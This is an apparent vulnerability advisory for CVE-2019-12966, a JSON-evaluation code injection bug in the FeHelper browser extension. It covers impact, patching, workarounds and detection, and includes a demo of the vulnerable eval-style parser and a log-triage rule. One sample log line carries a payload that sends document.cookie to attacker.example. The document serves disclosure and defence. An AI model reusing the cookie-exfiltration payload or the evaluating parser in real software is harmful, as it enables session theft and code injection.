CVE-2019-12966
📋 TL;DR
FeHelper browser extension builds through 2019-06-19 contain a code injection vulnerability in the JSON parsing feature: crafted JSON input is executed as JavaScript rather than parsed as data. An attacker who can get such input into the JSON tool runs arbitrary JavaScript with the extension's privileges, which can expose session cookies, page data, and other browser-side secrets. Every user running a vulnerable FeHelper build is affected, whichever supported browser (Chrome, Firefox, or others) it is installed in.
💻 Affected Systems
- FeHelper browser extension
📦 What is this software?
FeHelper by the FeHelper Project (zxlie/FeHelper on GitHub): an open-source front-end developer toolbox browser extension whose tools include a JSON formatter/viewer, the feature affected by this CVE.
⚠️ Risk & Real-World Impact
Worst Case
Arbitrary JavaScript running in the extension's context with whatever permissions FeHelper has been granted. Depending on those permissions, that can mean reading page content and cookies from sites the extension can access, stealing credentials and session tokens, exfiltrating data, or performing actions as the authenticated user. Extension code cannot by itself install native malware on the host; the blast radius is the browser's data and sessions, not the operating system.
Likely Case
Session hijacking, credential theft, and data exfiltration from whatever browser context the injected JavaScript runs in (the extension's own pages and any pages its content scripts can reach).
If Mitigated
Negligible if the extension is disabled or removed, at the cost of losing FeHelper's tools until an updated build is installed.
🎯 Exploit Status
The public proof of concept is a small JSON document whose value contains JavaScript that runs when FeHelper "parses" it. No memory corruption or browser bug is involved; exploitation only requires getting attacker-controlled JSON in front of the vulnerable feature, for example by luring the user to a page that serves a crafted JSON response or by getting them to paste untrusted JSON into the FeHelper JSON tool.
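The bug class behind this CVE, shown as an added example (this is illustrative code, not FeHelper's source, and the function names and the payload are constructed): a "JSON" formatter that accepts relaxed JavaScript object literals by evaluating its input, next to the strict `JSON.parse` replacement. The same payload yields a parsed object and a side effect under the evaluating parser, and a `SyntaxError` with no side effect under the strict one.

```javascript
// Added illustration of CVE-2019-12966's bug class (example code, not
// FeHelper's own source). Function names and the payload are constructed.

// Vulnerable pattern: tolerate unquoted keys, single quotes, trailing
// commas, etc. by handing the whole string to the JavaScript engine.
// Any expression in the input runs with the caller's privileges.
function parseJsonViaEval(text) {
  return new Function("return (" + text + ");")();
}

// Hardened replacement: strict JSON grammar only. Input that is not JSON
// throws a SyntaxError instead of executing. If relaxed syntax is a real
// requirement, use a tokenizer-based parser (e.g. a JSON5 library), never
// eval/new Function.
function parseJsonStrict(text) {
  return JSON.parse(text);
}

// Constructed payload in the spirit of the public proof of concept:
// JSON-looking text whose "id" value is a JavaScript expression with a
// side effect (here a flag on globalThis so the effect can be observed).
const PAYLOAD = '{"user": "alice", "id": (globalThis.__demoCodeRan = true, 1)}';

// Runs the payload through the vulnerable parser and reports whether the
// embedded expression executed.
function demoVulnerable() {
  globalThis.__demoCodeRan = false;
  const parsed = parseJsonViaEval(PAYLOAD);
  return { parsed, codeRan: globalThis.__demoCodeRan === true };
}

// Runs the same payload through the strict parser: it is rejected and the
// flag is never set.
function demoHardened() {
  globalThis.__demoCodeRan = false;
  try {
    parseJsonStrict(PAYLOAD);
    return { rejected: false, codeRan: globalThis.__demoCodeRan === true };
  } catch (err) {
    return {
      rejected: err instanceof SyntaxError,
      codeRan: globalThis.__demoCodeRan === true,
    };
  }
}

console.log("evaluating parser:", demoVulnerable());
console.log("strict parser:    ", demoHardened());
```

The point for reviewers is that the dangerous line is the one that builds code from data (`new Function`, `eval`, `setTimeout` with a string); any "JSON" feature that needs such a call to accept its input is a code injection sink, regardless of how the input reaches it.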
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: any FeHelper build published after 2019-06-19 (the fix landed in the upstream repository after the linked issue was reported)
Vendor Advisory: https://github.com/zxlie/FeHelper/issues/63
Restart Required: No
Instructions:
1. Open the browser's extensions page (chrome://extensions/ in Chrome, about:addons in Firefox).
2. Locate the FeHelper extension.
3. Check for an update; if none is offered, remove the extension.
4. If updating manually, download the latest release from the official repository (https://github.com/zxlie/FeHelper) rather than a third-party mirror.
🔧 Temporary Workarounds
Disable FeHelper Extension
Platform: all
Temporarily disable the FeHelper extension to prevent exploitation.
Browser-specific: chrome://extensions/ or about:addons
Remove FeHelper Extension
Platform: all
Completely remove the vulnerable extension until a patched build is available.
Browser-specific removal via extensions management page
🧯 If You Can't Patch
- Disable FeHelper immediately in every browser profile where it is installed.
- Do not rely on Content Security Policy headers on your own web applications as a mitigation: a page's CSP governs scripts on that page, not code running inside an extension's own context, so it does not stop the extension from executing crafted JSON.
- Treat JSON from untrusted sources as untrusted input: do not paste it into browser tooling that is known to evaluate rather than parse it.
🔍 How to Verify
Check if Vulnerable:
Check the FeHelper version on the browser's extensions page. Extension version strings are not dates; "through 2019-06-19" refers to the upstream code as of that day, so compare the installed version against the first release published after the fix (see the linked issue). If the installed build predates the fix or its origin is unclear, reinstall from the official repository or store listing.
Check Version:
Browser-specific: Check extensions management page for FeHelper version details
Verify Fix Applied:
Confirm the installed FeHelper version matches a release published after 2019-06-19, or that the extension is removed or disabled in every profile.
📡 Detection & Monitoring
Log Indicators:
- Browser or endpoint extension inventory showing a FeHelper build older than the fix (enterprise extension reporting, where available)
- FeHelper extension errors or crashes around the JSON formatting feature
Network Indicators:
- Requests to unexpected domains shortly after the browser fetched or the user formatted a JSON document
- Outbound requests carrying cookie or token material from a browser that has the extension installed
SIEM Query:
Where JSON payloads handled by the browser are logged (proxy logs, download logs, or extension telemetry), flag payloads that fail strict JSON parsing but contain code tokens such as function, eval(, or =>. Grepping for those words alone is noisy, because legitimate JSON string values may contain them; the signal is code-like text that a strict parser rejects.
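A triage rule for the "suspicious JSON payload" indicator, as an added example (not part of the original advisory; the log line format `<timestamp> <source> payload=<text>` and the sample lines are constructed for this illustration). Rather than matching the words `function` or `eval` anywhere, it classifies a payload as suspicious only when strict `JSON.parse` rejects it and it still contains tokens that only make sense as code, which keeps harmless JSON strings mentioning those words out of the alert queue.

```javascript
// Added detection example (not from the advisory). The log format and the
// sample lines below are constructed; adapt the payload extraction to the
// real source (proxy log, extension telemetry, etc.).

// Tokens that do not occur in valid JSON outside string values; after a
// failed strict parse, their presence indicates code rather than data.
const CODE_TOKENS =
  /\b(function|eval|Function|fetch|XMLHttpRequest|document|window|location|setTimeout)\b|=>/;

// Classifies a single payload: "json" (data only, JSON.parse never executes
// anything), "suspicious" (not JSON and contains code tokens) or
// "malformed" (not JSON, no code tokens, e.g. truncated).
function classifyPayload(payload) {
  try {
    JSON.parse(payload);
    return "json";
  } catch (err) {
    return CODE_TOKENS.test(payload) ? "suspicious" : "malformed";
  }
}

// Constructed sample log lines (not real telemetry).
const SAMPLE_LOG = [
  '2019-06-20T10:00:01Z fehelper payload={"name":"eval() is a JS function"}',
  '2019-06-20T10:00:02Z fehelper payload={"id": function(){ fetch("https://attacker.example/?c="+document.cookie) }()}',
  '2019-06-20T10:00:03Z fehelper payload={"broken": ',
  '2019-06-20T10:00:04Z fehelper payload={"x": (()=>1)()}',
];

// Buckets each line by the classification of its payload field.
function triage(lines) {
  const out = { json: [], suspicious: [], malformed: [] };
  const marker = "payload=";
  for (const line of lines) {
    const i = line.indexOf(marker);
    if (i < 0) continue; // no payload field on this line
    const payload = line.slice(i + marker.length);
    out[classifyPayload(payload)].push(line);
  }
  return out;
}

const result = triage(SAMPLE_LOG);
for (const bucket of Object.keys(result)) {
  console.log(`${bucket}: ${result[bucket].length}`);
  for (const line of result[bucket]) console.log("  " + line);
}
```

Note that the first sample line mentions both `eval()` and `function` inside a string value and is correctly classified as plain JSON, while the second and fourth lines, which only an evaluating parser would accept, are the ones that reach the suspicious bucket.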